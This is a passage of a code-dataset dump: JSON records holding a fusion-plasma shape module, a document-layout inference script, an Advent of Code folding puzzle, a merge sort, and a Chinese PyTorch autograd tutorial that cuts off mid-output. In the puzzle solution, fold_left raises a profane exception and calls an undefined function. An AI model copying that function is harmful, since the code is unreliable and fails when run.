out.params.z0 = center.z\n out.params.side = ShapeSide.NOSHIFT\n else:\n out.points = spline_interpolate_points(\n out.points, num_points, out.x_points or [])\n if out.params:\n out.params.side = ShapeSide.NOSHIFT\n else:\n # Copied from FGE. Details: https://doi.org/10.1017/S0022377815001270\n top = max(out.points, key=lambda p: p.z)\n left = min(out.points, key=lambda p: p.r)\n right = max(out.points, key=lambda p: p.r)\n bottom = min(out.points, key=lambda p: p.z)\n center = Point((left.r + right.r) / 2,\n (top.z + bottom.z) / 2)\n\n radius = (right.r - left.r) / 2\n kappa = (top.z - bottom.z) / (right.r - left.r)\n delta_lower = (center.r - bottom.r) / radius # upper triangularitiy\n delta_upper = (center.r - top.r) / radius # lower triangularity\n delta = (delta_lower + delta_upper) / 2\n\n out.params = ParametrizedShape(\n r0=center.r, z0=center.z, radius=radius, kappa=kappa, delta=delta,\n lambda_=0, side=ShapeSide.NOSHIFT)\n\n return out\n\n\ndef points_from_references(\n references: named_array.NamedArray, key: str = \"shape1\",\n num: Optional[int] = None) -> ShapePoints:\n points = np.array([references[f\"{key}_r\"], references[f\"{key}_z\"]]).T\n if num is not None:\n points = points[:num]\n return to_shape_points(points)\n\n\n@dataclasses.dataclass\nclass ReferenceTimeSlice:\n shape: Shape\n time: float\n hold: Optional[float] = None # Absolute time.\n\n def __post_init__(self):\n if self.hold is None:\n self.hold = self.time\n\n\ndef canonicalize_reference_series(\n time_slices: List[ReferenceTimeSlice]) -> List[ReferenceTimeSlice]:\n \"\"\"Canonicalize a full sequence of time slices.\"\"\"\n outputs = []\n for ref in time_slices:\n ref_shape = ref.shape.canonical()\n\n prev = outputs[-1] if outputs else None\n if prev is not None and prev.hold + tcv_common.DT < ref.time:\n leg_diff = len(ref_shape.legs or []) != len(prev.shape.legs or [])\n xp_diff = len(ref_shape.x_points or []) != len(prev.shape.x_points or [])\n div_diff = ref_shape.diverted != prev.shape.diverted\n limit_diff = (\n bool(ref_shape.limit_point and ref_shape.limit_point.r > 0) !=\n bool(prev.shape.limit_point and prev.shape.limit_point.r > 0))\n if leg_diff or xp_diff or div_diff or limit_diff:\n # Try not to interpolate between a real x-point and a non-existent\n # x-point. Non-existent x-points are represented as being at the\n # origin, i.e. out to the left of the vessel, and could be interpolated\n # into place, but that's weird, so better to pop it into existence by\n # adding an extra frame one before with the new shape targets.\n # This doesn't handle the case of multiple points appearing/disappearing\n # out of order, or of one moving while the other disappears.\n outputs.append(\n ReferenceTimeSlice(\n time=ref.time - tcv_common.DT,\n shape=Shape(\n ip=ref_shape.ip,\n params=ref_shape.params,\n points=ref_shape.points,\n x_points=(prev.shape.x_points\n if xp_diff else ref_shape.x_points),\n legs=(prev.shape.legs if leg_diff else ref_shape.legs),\n limit_point=(prev.shape.limit_point\n if limit_diff else ref_shape.limit_point),\n diverted=(prev.shape.diverted\n if div_diff else ref_shape.diverted))))\n\n outputs.append(ReferenceTimeSlice(ref_shape, ref.time, ref.hold))\n\n return outputs\n","repo_name":"deepmind/deepmind-research","sub_path":"fusion_tcv/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":16993,"program_lang":"python","lang":"en","doc_type":"code","stars":11900,"dataset":"github-code","pt":"37"} +{"seq_id":"29419769617","text":"import argparse\n\nimport cv2\n\nfrom ditod import add_vit_config\n\nimport torch\n\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import ColorMode, Visualizer\nfrom detectron2.data import MetadataCatalog\nfrom ditod.VGTTrainer import DefaultPredictor\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Detectron2 inference script\")\n parser.add_argument(\n \"--image_root\",\n help=\"Path to input image\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--grid_root\",\n help=\"Path to input image\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--image_name\",\n help=\"Path to input image\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--output_root\",\n help=\"Name of the output visualization file.\",\n type=str,\n )\n parser.add_argument(\n \"--dataset\",\n help=\"Path to input image\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--config-file\",\n default=\"configs/quick_schedules/mask_rcnn_R_50_FPN_inference_acc_test.yaml\",\n metavar=\"FILE\",\n help=\"path to config file\",\n )\n parser.add_argument(\n \"--opts\",\n help=\"Modify config options using the command-line 'KEY VALUE' pairs\",\n default=[],\n nargs=argparse.REMAINDER,\n )\n\n args = parser.parse_args()\n \n if args.dataset in ('D4LA', 'doclaynet'):\n image_path = args.image_root + args.image_name + \".png\"\n else:\n image_path = args.image_root + args.image_name + \".jpg\"\n \n if args.dataset == 'publaynet':\n grid_path = args.grid_root + args.image_name + \".pdf.pkl\"\n elif args.dataset == 'docbank':\n grid_path = args.grid_root + args.image_name + \".pkl\"\n elif args.dataset == 'D4LA':\n grid_path = args.grid_root + args.image_name + \".pkl\"\n elif args.dataset == 'doclaynet':\n grid_path = args.grid_root + args.image_name + \".pdf.pkl\"\n \n output_file_name = args.output_root + args.image_name + \".jpg\"\n \n # Step 1: instantiate config\n cfg = get_cfg()\n add_vit_config(cfg)\n cfg.merge_from_file(args.config_file)\n \n # Step 2: add model weights URL to config\n cfg.merge_from_list(args.opts)\n \n # Step 3: set device\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n cfg.MODEL.DEVICE = device\n\n # Step 4: define model\n predictor = DefaultPredictor(cfg)\n \n # Step 5: run inference\n img = cv2.imread(image_path)\n \n md = MetadataCatalog.get(cfg.DATASETS.TEST[0])\n if args.dataset == 'publaynet':\n md.set(thing_classes=[\"text\",\"title\",\"list\",\"table\",\"figure\"])\n elif args.dataset == 'docbank':\n md.set(thing_classes=[\"abstract\",\"author\",\"caption\",\"date\",\"equation\", \"figure\", \"footer\", \"list\", \"paragraph\", \"reference\", \"section\", \"table\", \"title\"])\n elif args.dataset == 'D4LA':\n md.set(thing_classes=[\"DocTitle\",\"ParaTitle\",\"ParaText\",\"ListText\",\"RegionTitle\", \"Date\", \"LetterHead\", \"LetterDear\", \"LetterSign\", \"Question\", \"OtherText\", \"RegionKV\", \"Regionlist\", \"Abstract\", \"Author\", \"TableName\", \"Table\", \"Figure\", \"FigureName\", \"Equation\", \"Reference\", \"Footnote\", \"PageHeader\", \"PageFooter\", \"Number\", \"Catalog\", \"PageNumber\"])\n elif args.dataset == 'doclaynet':\n md.set(thing_classes=[\"Caption\",\"Footnote\",\"Formula\",\"List-item\",\"Page-footer\", \"Page-header\", \"Picture\", \"Section-header\", \"Table\", \"Text\", \"Title\"])\n\n output = predictor(img, grid_path)[\"instances\"]\n \n # import ipdb;ipdb.set_trace()\n v = Visualizer(img[:, :, ::-1],\n md,\n scale=1.0,\n instance_mode=ColorMode.SEGMENTATION)\n result = v.draw_instance_predictions(output.to(\"cpu\"))\n result_image = result.get_image()[:, :, ::-1]\n\n # step 6: save\n cv2.imwrite(output_file_name, result_image)\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"AlibabaResearch/AdvancedLiterateMachinery","sub_path":"DocumentUnderstanding/VGT/object_detection/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","stars":379,"dataset":"github-code","pt":"37"} +{"seq_id":"25136194781","text":"import aocd\nimport sys\n\nfrom collections import defaultdict\nfrom functools import reduce\n\n# Eager evaluation makes this easier\nlmap = lambda x, y: list(map(x, y))\nlfilter = lambda x, y: list(filter(x, y))\n\n\ndef get_input():\n if len(sys.argv) == 1:\n return aocd.get_data(day=13).split(\"\\n\")\n else:\n with open(\"input\", \"r\") as filey:\n return lmap(lambda x: x.strip(), filey)\n\n\ndef transformed_input():\n nums = []\n directions = []\n for line in get_input():\n if len(line) == 0:\n continue\n elif line[0] != 'f':\n nums.append(line)\n else:\n directions.append(line)\n new_directions = []\n for direction in directions:\n yx, num = direction.split(\"=\")\n yx = 'y' if yx.endswith('y') else 'x'\n new_directions.append((yx, int(num)))\n\n return lmap(lambda x: (int(x[1]), int(x[0])), map(lambda x: x.split(\",\"),\n nums)), new_directions\n\n\nget_maxi = lambda spots: max(map(lambda x: x[0], spots))\nget_maxj = lambda spots: max(map(lambda x: x[1], spots))\n\n\ndef sg(matrix, i, j):\n if len(matrix) > i and len(matrix[0]) > j:\n return matrix[i][j]\n return 0\n\n\ndef merge_top(top, bottom):\n maxi = max(len(top), len(bottom))\n maxj = max(len(top[0]), len(bottom[0]))\n matrix_top = [[sg(top, i, j) for j in range(maxj)] for i in range(maxi)]\n return [[sg(bottom, maxi - i - 1, j) | matrix_top[i][j]\n for j in range(maxj)]\n for i in range(maxi)]\n\n\ndef fold_top(matrix, rows):\n top = matrix[:rows][:]\n bottom = matrix[rows + 1:][:]\n return merge_top(top, bottom)\n\n\ndef fold_left(matrix, columns):\n left = [matrix[i][:columns][:] for i in range(len(matrix))]\n right = [matrix[i][columns + 1::][:] for i in range(len(matrix))]\n raise Exception(\"Fuck you\")\n return mer(left, right)\n\n\ndef pretty_print(matrix):\n for row in matrix:\n for column in row:\n print('#' if column == 1 else '.', end=\"\")\n print()\n print()\n\n\ndef solution():\n spots, directions = transformed_input()\n print(\"Spots\", spots)\n print(\"Directions\", directions)\n maxi = get_maxi(spots) + 1\n maxj = get_maxj(spots) + 1\n s = set(spots)\n matrix = [[1 if (i, j) in s else 0 for j in range(maxj)] for i in range(maxi)]\n pretty_print(matrix)\n for (xy, line) in directions:\n if xy == 'x':\n matrix = fold_left(matrix, line)\n else:\n matrix = fold_top(matrix, line)\n pretty_print(matrix)\n return sum(map(sum, matrix))\n\n\nif __name__ == \"__main__\":\n print(solution())\n","repo_name":"justinba1010/aoc2021","sub_path":"2021/d13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3562873696","text":"def mergeSort(alist):\n if len(alist) <= 1:\n return alist\n mid = len(alist) // 2\n\n left = mergeSort(alist[:mid])\n right = mergeSort(alist[mid:])\n print('left:', left)\n print('right:', right)\n return merge(left, right)\n\n\ndef merge(left, right):\n result = []\n i, j = 0, 0\n while i < len(left) and j < len(right): # 两个指针同步移动\n if left[i] <= right[j]:\n result.append(left[i])\n i = i + 1\n else:\n result.append(right[j])\n j = j + 1\n # 下面两条语句中,只有一个会执行\n result += left[i:] # 若第一个表未检测完,添加到result后面\n result += right[j:] # 若第二个表未检测完,添加到result后面\n return result\n\n\nseq = [5, 3, 0, 6, 1, 4]\nprint('排序前:', seq)\nresult = mergeSort(seq)\nprint('排序后:', result)","repo_name":"xiaokongkong/some-tricks-about-python","sub_path":"刷题/排序/归并排序.py","file_name":"归并排序.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26366506566","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"\ndetach(), torch.no_grad() 和 model.eval() 的区别和联系:\n\n\ndetach() 和 torch.no_grad() 都可以实现相同的效果,只是前者会麻烦一点,对每一个变量都要加上,而后者就不用管了:\n - detach() 会返回一个新的Tensor对象,不会在反向传播中出现,是相当于复制了一个变量,将它原本requires_grad=True变为了requires_grad=False\n - torch.no_grad() 通常是在推断(inference)的时候,用来禁止梯度计算,仅进行前向传播。在训练过程中,就像画了个圈,来,在我这个圈里面跑一下,都不需要计算梯度,就正向传播一下。\n\n\n而model.eval()和torch.no_grad()两者都用,因为两者有着不同的作用:\n - torch.no_grad():在autograd中禁用梯度跟踪\n - model.eval():更改所调用模块的forward()行为。例如,它禁用dropout,并使用测试时bn norm\n\nmodel.eval()\n 使用model.eval()切换到测试模式,不会更新模型的k,b参数\n 通知dropout层和batchnorm层在train和val中间进行切换\n 在train模式,dropout层会按照设定的参数p设置保留激活单元的概率(保留概率=p,比如keep_prob=0.8),batchnorm层会继续计算数据的mean和var并进行更新\n 在val模式下,dropout层会让所有的激活单元都通过,而batchnorm层会停止计算和更新mean和var,直接使用在训练阶段已经学出的mean和var值\n model.eval()不会影响各层的gradient计算行为,即gradient计算和存储与training模式一样,只是不进行反向传播(backprobagation)\n\n\nmodel.eval()与torch.no_grad()可以同时用,更加节省cpu的算力\n\n\"\"\"\n\nfrom __future__ import print_function\nimport torch\nimport numpy as np\n\n\n\n#=============================================================================\n# Autograd: 自动求导机制\n#=============================================================================\n\n# requires_grad: 如果需要为张量计算梯度,则为True,否则为False。我们使用pytorch创建tensor时,可以指定requires_grad为True(默认为False),\n\n# grad_fn: grad_fn用来记录变量是怎么来的,方便计算梯度,y = x*3,grad_fn记录了y由x计算的过程。\n\n# grad:当执行完了backward()之后,通过x.grad查看x的梯度值。\n\n# 像x这种直接创建的称为叶子节点,叶子节点对应的grad_fn是None。\n\n# 如果一个张量地requires_grad=True,那么在调用backward()方法时反向传播计算梯度,我们\n# 会为这个张量计算梯度,但是计算完梯度之后这个梯度并不一定会一直保存在属性grad中.只有对于\n# requires_grad=True的叶子张量,我们才会将梯度一直保存在该叶子张量的grad属性中,对于非叶子节点,\n# 即中间节点的张量,我们在计算完梯度之后为了更高效地利用内存,我们会将梯度grad的内存释放掉.)\n\n#----------------------------------------------- requires_grad ----------------------------------------------\n# 测试一些什么都不做,查看计算的梯度\nimport torch\n\nx = torch.tensor([1.0, 2.0])\ny1 = x ** 2\ny2 = y1 * 2\ny3 = y1 + y2\n\nprint(y1, y1.requires_grad)\nprint(y2, y2.requires_grad)\nprint(y3, y3.requires_grad)\n\n# 为什么backward里面需要加一个torch.ones(y3.shape)?\n# 这是另外一个需要讨论的问题了可以在留言区一起讨论\ny3.backward(torch.ones(y3.shape)) # y1.backward() y2.backward()\nprint(x.grad)\n\n# tensor([1., 4.]) False\n# tensor([2., 8.]) False\n# tensor([ 3., 12.]) False\n\n# RuntimeError: element 0 of tensors does not require grad and does not have a grad_fn\n\n\n#----------------------------------------------- 分割线 ----------------------------------------------\n# 测试一些什么都不做,查看计算的梯度\nimport torch\n\nx = torch.tensor([1.0, 2.0], requires_grad=True)\ny1 = x ** 2\ny2 = y1 * 2\ny3 = y1 + y2\n\nprint(y1, y1.requires_grad)\nprint(y2, y2.requires_grad)\nprint(y3, y3.requires_grad)\n\ny3.backward(torch.ones(y3.shape)) # y1.backward() y2.backward()\nprint(x.grad)\n\n# tensor([1., 4.], grad_fn=) True\n# tensor([2., 8.], grad_fn=) True\n# tensor([ 3., 12.], grad_fn=) True\n# tensor([ 6., 12.])\n\n\"\"\"\n1. 当grad_fn设置为Fasle或者默认时:计算梯度会出现如下错误\nRuntimeError: element 0 of tensors does not require grad and does not have a grad_fn\n因为并没有追踪到任何计算历史,所以就不存在梯度的计算了\n\n2. 因此在最开始定义x张量的时候,就应当设置好是否计算追踪历史计算记录\n\"\"\"\n\n\n#----------------------------------------------- detach(): ----------------------------------------------\n# 设置好requires_grad的值为True\nimport torch\n\nx = torch.tensor([1.0, 2.0], requires_grad=True)\ny1 = x ** 2\ny2 = y1.detach() * 2 # 注意这里在计算y2的时候对y1进行了detach()\ny3 = y1 + y2\n\nprint(y1, y1.requires_grad)\nprint(y2, y2.requires_grad)\nprint(y3, y3.requires_grad)\n\n\ny3.backward(torch.ones(y3.shape)) # y1.backward() y2.backward()\nprint(x.grad)\n\n# tensor([1., 4.], grad_fn=) True\n# tensor([2., 8.]) False\n# tensor([ 3., 12.], grad_fn=) True\n# tensor([2., 4.])\n\n\n#----------------------------------------------- detach(): ----------------------------------------------\n# 当使用detach()分离tensor但是没有更改这个tensor时,并不会影响backward():\n\nimport torch\n\na = torch.tensor([1, 2, 3.], requires_grad=True)\nprint(a.grad)\nout = a.sigmoid()\nprint(out)\n\n#添加detach(),c的requires_grad为False\nc = out.detach()\nprint(c)\nprint(out.grad)\nprint(c.grad)\n\n#这时候没有对c进行更改,所以并不会影响backward()\nout.sum().backward()\nprint(a.grad)\n\n'''返回:\nNone\ntensor([0.7311, 0.8808, 0.9526], grad_fn=)\ntensor([0.7311, 0.8808, 0.9526])\ntensor([0.1966, 0.1050, 0.0452])\n'''\n\n\n#----------------------------------------------- detach(): ----------------------------------------------\n# 当使用detach()分离tensor,然后用这个分离出来的tensor去求导数,会影响backward(),会出现错误\nimport torch\n\na = torch.tensor([1, 2, 3.], requires_grad=True)\nprint(a.grad)\nout = a.sigmoid()\nprint(out)\n\n#添加detach(),c的requires_grad为False\nc = out.detach()\nprint(c)\n\n#使用新生成的Variable进行反向传播\nc.sum().backward()\nprint(a.grad)\n\n'''返回:\nNone\ntensor([0.7311, 0.8808, 0.9526], grad_fn=)\ntensor([0.7311, 0.8808, 0.9526])\nTraceback (most recent call last):\n File \"test.py\", line 13, in \n c.sum().backward()\n File \"/anaconda3/envs/deeplearning/lib/python3.6/site-packages/torch/tensor.py\", line 102, in backward\n torch.autograd.backward(self, gradient, retain_graph, create_graph)\n File \"/anaconda3/envs/deeplearning/lib/python3.6/site-packages/torch/autograd/__init__.py\", line 90, in backward\n allow_unreachable=True) # allow_unreachable flag\nRuntimeError: element 0 of tensors does not require grad and does not have a grad_fn\n'''\n\n#----------------------------------------------- detach(): ----------------------------------------------\n# 当使用detach()分离tensor并且更改这个tensor时,即使再对原来的out求导数,会影响backward(),会出现错误\n\n\nimport torch\n\na = torch.tensor([1, 2, 3.], requires_grad=True)\nprint(a.grad)\nout = a.sigmoid()\nprint(out)\n\n#添加detach(),c的requires_grad为False\nc = out.detach()\nprint(c)\nc.zero_() #使用in place函数对其进行修改\n\n#会发现c的修改同时会影响out的值\nprint(c)\nprint(out)\n\n#这时候对c进行更改,所以会影响backward(),这时候就不能进行backward(),会报错\nout.sum().backward()\nprint(a.grad)\n\n'''返回:\nNone\ntensor([0.7311, 0.8808, 0.9526], grad_fn=)\ntensor([0.7311, 0.8808, 0.9526])\ntensor([0., 0., 0.])\ntensor([0., 0., 0.], grad_fn=)\nTraceback (most recent call last):\n File \"test.py\", line 16, in \n out.sum().backward()\n File \"/anaconda3/envs/deeplearning/lib/python3.6/site-packages/torch/tensor.py\", line 102, in backward\n torch.autograd.backward(self, gradient, retain_graph, create_graph)\n File \"/anaconda3/envs/deeplearning/lib/python3.6/site-packages/torch/autograd/__init__.py\", line 90, in backward\n allow_unreachable=True) # allow_unreachable flag\nRuntimeError: one of the variables needed for gradient computation has been modified\nby an inplace operation\n'''\n\n\n\"\"\"\n对比一下使用detach()前后的梯度值tensor([ 6., 12.])和tensor([2., 4.])\n(1)tensor([ 6., 12.])\n\ny3 = y2 + y1,根据 y2 = y1*2, 而y1 = x ** 2\n所以y3 = 3x**2, y3对xi的偏导则为6xi\n针对x = [1, 2]\n所以,对应的梯度(偏导)则为:[6, 12]\n\n(2)tensor([ 2., 4.])\n\ny3 = y2 + y1,因为y2是根据y1.detach()得到的;\n根据��义,所以计算梯度的时候不考虑y2,但是实际计算y3的值还是按原公式\n因此计算梯度时。y3 = y1 + (y2不考虑),所以y3 = x ** 2\ny3对xi的偏导则为2xi\n针对x = [1, 2]\n所以,对应的梯度(偏导)则为:[2, 4]\n\n当我们在计算到某一步时,不需要在记录某一个张量的时,就可以使用detach()将其从追踪记录当中分离出来,这样一来该张量对应计算产生的梯度就不会被考虑了。\n\n\n\"\"\"\n\n#----------------------------------------------- with torch.no_grad() ----------------------------------------------\n# 设置好requires_grad的值为True\nimport torch\n\nx = torch.tensor([1.0, 2.0], requires_grad=True)\ny1 = x ** 2\n\nwith torch.no_grad(): # 这里使用了no_grad()包裹不需要被追踪的计算过程\n y2 = y1 * 2\n\ny3 = y1 + y2\n\nprint(y1, y1.requires_grad)\nprint(y2, y2.requires_grad)\nprint(y3, y3.requires_grad)\n\ny3.backward(torch.ones(y3.shape)) # y1.backward() y2.backward()\nprint(x.grad)\n\n\"\"\"\n可想而知,实际上torch.no_grad()功能和detach()方法作用是一致的。\n有差区别?\ndetach()是考虑将单个张量从追踪记录当中脱离出来;\n而torch.no_grad()是一个warper,可以将多个计算步骤的张量计算脱离出去,本质上没啥区别。\n\"\"\"\n\n\"\"\"\nrequires_grad:在最开始创建Tensor时候可以设置的属性,用于表明是否追踪当前Tensor的计算操作。后面也可以通过requires_grad_()方法设置该参数,但是只有叶子节点才可以设置该参数。\ndetach()方法:则是用于将某一个Tensor从计算图中分离出来。返回的是一个内存共享的Tensor,一变都变。\ntorch.no_grad():对所有包裹的计算操作进行分离。\n但是torch.no_grad()将会使用更少的内存,因为从包裹的开始,就表明不需要计算梯度了,因此就不需要保存中间结果。3\n.data则是以前Pytorch中Variable的一个属性,返回的是一个共享内存的Tensor,一变都变,只是现在很少使用了。\n\"\"\"\n\n\n#----------------------------------------------- 分割线 ----------------------------------------------\nimport torch\n\nx = torch.ones(2, 2, requires_grad=True)\ny = x + 2\nz = y * y * 3\nout = z.mean()\n#x->y->z->out\nprint(f\"x = {x}\\n\")\nprint(f\"y = {y}\\n\")\nprint(f\"z = {z}\\n\")\nprint(f\"out = {out}\\n\")\nprint(f\"out.grad_fn = {out.grad_fn}\\n\")\n\n\"\"\"\nx = tensor([[1., 1.],\n [1., 1.]], requires_grad=True)\n\ny = tensor([[3., 3.],\n [3., 3.]], grad_fn=)\n\nz = tensor([[27., 27.],\n [27., 27.]], grad_fn=)\n\nout = 27.0\n\nout.grad_fn = \n\n\n\n这里,我们可以将x假想成神经网络的输入,y是神经网络的隐藏层,z是神经网络的输出,最后的out是损失函数;或者说我们建立了一个简单的计算图,数据从x流向out。可以看到,只要x设置了requires_grad=True,那么计算图后续的节点用grad_fn记录了计算图中各步的传播过程。\n现在,我们从out开始进行反向传播:\n\"\"\"\n#反向传播 因为 out是一个纯量(scalar),out.backward() 等于out.backward(torch.tensor(1))。\nout.backward(torch.tensor(1))\n\nprint(f\"x.grad = {x.grad}\\n\")\n\n\"\"\"\nx.grad = tensor([[9., 9.],\n [9., 9.]])\n\n\n拓展到深度学习,从输入开始,每层都有大量参数W和b,这些参数也是Tensor结构。给Tensor设置了requires_grad=True后,PyTorch会跟踪Tensor之后的所有计算,经过.backward()后,PyTorch自动帮我们计算损失函数对于这些参数的梯度,梯度存储在了.grad属性里,PyTorch会按照梯度下降法更新参数。\n\n在PyTorch中,.backward()方法默认只会对计算图中的叶子节点求导。在上面的例子里,x就是叶子节点,y和z都是中间变量,他们的.grad属性都是None。而且,PyTorch目前只支持浮点数的求导。\n\n另外,PyTorch的自动求导一般只是标量对向量/矩阵求导。在深度学习中,最后的损失函数一般是一个标量值,是样本数据经过前向传播得到的损失值的和,而输入数据是一个向量或矩阵。在刚才的例子中,y是一个矩阵,.mean()对y求导,得到的是标量。\n\"\"\"\n\n\n#----------------------------------------------- 分割线 ----------------------------------------------\n\nimport torch\n\n\nx = torch.ones(2, 2, requires_grad=True)\ny = x + 2\nz = y * y * 3\nout = z.mean()\n#x->y->z->out\nprint(f\"x = {x}\\n\")\nprint(f\"y = {y}\\n\")\nprint(f\"z = {z}\\n\")\nprint(f\"out = {out}\\n\")\nprint(f\"out.grad_fn = {out.grad_fn}\\n\")\n\n\"\"\"\nx = tensor([[1., 1.],\n [1., 1.]], requires_grad=True)\n\ny = tensor([[3., 3.],\n [3., 3.]], grad_fn=)\n\nz = tensor([[27., 27.],\n [27., 27.]], grad_fn=)\n\nout = 27.0\n\nout.grad_fn = \n\"\"\"\n\ngradients = torch.tensor([[0, 1],[2,3]], dtype=torch.float)\n#反向传播 因为 out是一个纯量(scalar),out.backward() 等于out.backward(torch.tensor(1))。\nz.backward(gradients)\n\nprint(f\"x.grad = {x.grad}\\n\")\n# x.grad = tensor([[ 0., 18.],\n# [36., 54.]])\n\n#----------------------------------------------- 分割线 ----------------------------------------------\nimport torch\n\nx = torch.ones(2, 2, requires_grad=True)\ny = x + 2\nz = y * y * 3\nout = z.mean()\n#x->y->z->out\nprint(f\"x = {x}\\n\")\nprint(f\"y = {y}\\n\")\nprint(f\"z = {z}\\n\")\nprint(f\"out = {out}\\n\")\nprint(f\"out.grad_fn = {out.grad_fn}\\n\")\n\n\"\"\"\nx = tensor([[1., 1.],\n [1., 1.]], requires_grad=True)\n\ny = tensor([[3., 3.],\n [3., 3.]], grad_fn=)\n\nz = tensor([[27., 27.],\n [27., 27.]], grad_fn=)\n\nout = 27.0\n\nout.grad_fn = \n\"\"\"\n\ngradients = torch.tensor([[0, 1],[2,3]], dtype=torch.float)\n#反向传播 因为 out是一个纯量(scalar),out.backward() 等于out.backward(torch.tensor(1))。\nout.backward(torch.tensor(2))\n\nprint(f\"x.grad = {x.grad}\\n\")\n\n#----------------------------------------------- 分割线 ----------------------------------------------\nimport torch\na = torch.randn(2, 2)\na = ((a * 3) / (a - 1))\nprint(f\"a.requires_grad = {a.requires_grad}\\n\")\na.requires_grad_(True)\nprint(f\"a.requires_grad = {a.requires_grad}\\n\")\nb = (a * a).sum()\nprint(f\"b.grad_fn = {b.grad_fn}\\n\")\n\n\n\"\"\"\na.requires_grad = False\n\na.requires_grad = True\n\nb.grad_fn = \n\"\"\"\n\n\n\nimport torch\na = torch.randn(2, 2)\na = ((a * 3) / (a - 1))\nprint(f\"a.requires_grad = {a.requires_grad}\\n\")\n\nb = (a * a).sum()\nprint(f\"b.grad_fn = {b.grad_fn}\\n\")\n\n\n\"\"\"\na.requires_grad = False\n\nb.grad_fn = None\n\"\"\"\n\n#----------------------------------------------- 分割线 ----------------------------------------------\n\n\n\n\nimport torch\nx = torch.randn(3, requires_grad=True)\n\ny = x * 2\n\n# data.norm()首先,它对张量y每个元素进行平方,然后对它们求和,最后取平方根。 这些操作计算就是所谓的L2或欧几里德范数 。\nwhile y.data.norm() < 1000:\n y = y * 2\n\nprint(f\"t = {y}\\n\")\n\n\n\"\"\"\n如果需要计算导数,你可以在Tensor上调用.backward()。 如果Tensor是一个标量(即它包含一个元素数据)则不需要为backward()指定任何参数,\n但是如果它有更多的元素,你需要指定一个gradient 参数来匹配张量的形状。\n\n\"\"\"\n\n\n#在这个情形中,y不再是个标量。torch.autograd无法直接计算出完整的雅可比行列,但是如果我们只想要vector-Jacobian product,只需将向量作为参数传入backward:\n\ngradients = torch.tensor([0.1, 1.0, 0.0001], dtype=torch.float)\ny.backward(gradients)\n\nprint(f\"x.grad = {x.grad}\\n\")\n\n\n#如果.requires_grad=True但是你又不希望进行autograd的计算, 那么可以将变量包裹在 with torch.no_grad()中:\nprint(x.requires_grad)\nprint((x ** 2).requires_grad)\n\nwith torch.no_grad():\n print((x ** 2).requires_grad)\n\n\n#----------------------------------------------- 分割线 ----------------------------------------------\nx = torch.randn(10, 5, requires_grad = True)\ny = torch.randn(10, 5, requires_grad = True)\nz = torch.randn(10, 5, requires_grad = True)\nprint(f\"x.requires_grad = {x.requires_grad}\")\nprint(f\"x.grad_fn = {x.grad_fn}\\n\")\nwith torch.no_grad():\n w = x + y + z\n out = w.sum()\n #out.backward()\n print(f\"x.requires_grad = {x.requires_grad}\")\n print(f\"x.grad = {x.grad}\")\n print(f\"x.grad_fn = {x.grad_fn}\\n\")\n\n print(f\"w.requires_grad = {w.requires_grad}\")\n print(f\"w.grad = {w.grad}\")\n print(f\"w.grad_fn = {w.grad_fn}\\n\")\n\n print(f\"out.requires_grad = {out.requires_grad}\")\n print(f\"out.grad = {out.grad}\")\n print(f\"out.grad_fn = {out.grad_fn}\\n\")\n\nprint(f\"x.requires_grad = {x.requires_grad}\")\nprint(f\"w.requires_grad = {w.requires_grad}\")\n\n#----------------------------------------------- 分割线 ----------------------------------------------\nx = torch.randn(10, 5, requires_grad = True)\ny = torch.randn(10, 5, requires_grad = True)\nz = torch.randn(10, 5, requires_grad = True)\nprint(f\"x.requires_grad = {x.requires_grad}\")\nprint(f\"x.grad_fn = {x.grad_fn}\\n\")\n\nw = x + y + z\nout = w.sum()\n#out.backward()\nprint(f\"x.requires_grad = {x.requires_grad}\")\nprint(f\"x.grad = {x.grad}\")\nprint(f\"x.grad_fn = {x.grad_fn}\\n\")\n\nprint(f\"w.requires_grad = {w.requires_grad}\")\nprint(f\"w.grad = {w.grad}\")\nprint(f\"w.grad_fn = {w.grad_fn}\\n\")\n\nprint(f\"out.requires_grad = {out.requires_grad}\")\nprint(f\"out.grad = {out.grad}\")\nprint(f\"out.grad_fn = {out.grad_fn}\\n\")\n\nprint(f\"x.requires_grad = {x.requires_grad}\")\nprint(f\"w.requires_grad = {w.requires_grad}\")\n\n\n#----------------------------------------------- 分割线 ----------------------------------------------\nimport torch\nfrom torch.autograd import Variable\n\nx = torch.Tensor([[1.,2.,3.],[4.,5.,6.]]) #grad_fn是None\nx = Variable(x, requires_grad=True)\ny = x + 2\nz = y*y*3\nout = z.mean()\n#x->y->z->out\nprint(f\"x = {x}\\n\")\nprint(f\"y = {y}\\n\")\nprint(f\"z = {z}\\n\")\nprint(f\"out = {out}\\n\")\n\n\"\"\"\nx = tensor([[1., 2., 3.],\n [4., 5., 6.]], requires_grad=True)\n\ny = tensor([[3., 4., 5.],\n [6., 7., 8.]], grad_fn=)\n\nz = tensor([[ 27., 48., 75.],\n [108., 147., 192.]], grad_fn=)\n\nout = 99.5\n\n\n这里,我们可以将x假想成神经网络的输入,y是神经网络的隐藏层,z是神经网络的输出,\n最后的out是损失函数;或者说我们建立了一个简单的计算图,数据从x流向out。\n可以看到,只要x设置了requires_grad=True,那么计算图后续的节点用grad_fn记录了计算图中各步的传播过程。\n\"\"\"\n\n\nout.backward()\nprint(f\"x.grad = {x.grad}\\n\")\nprint(f\"y.grad = {y.grad}\\n\")\nprint(f\"z.grad = {z.grad}\\n\")\n#结果:\n\"\"\"\nx.grad = tensor([[3., 4., 5.],\n [6., 7., 8.]])\n\ny.grad = None\n\nz.grad = 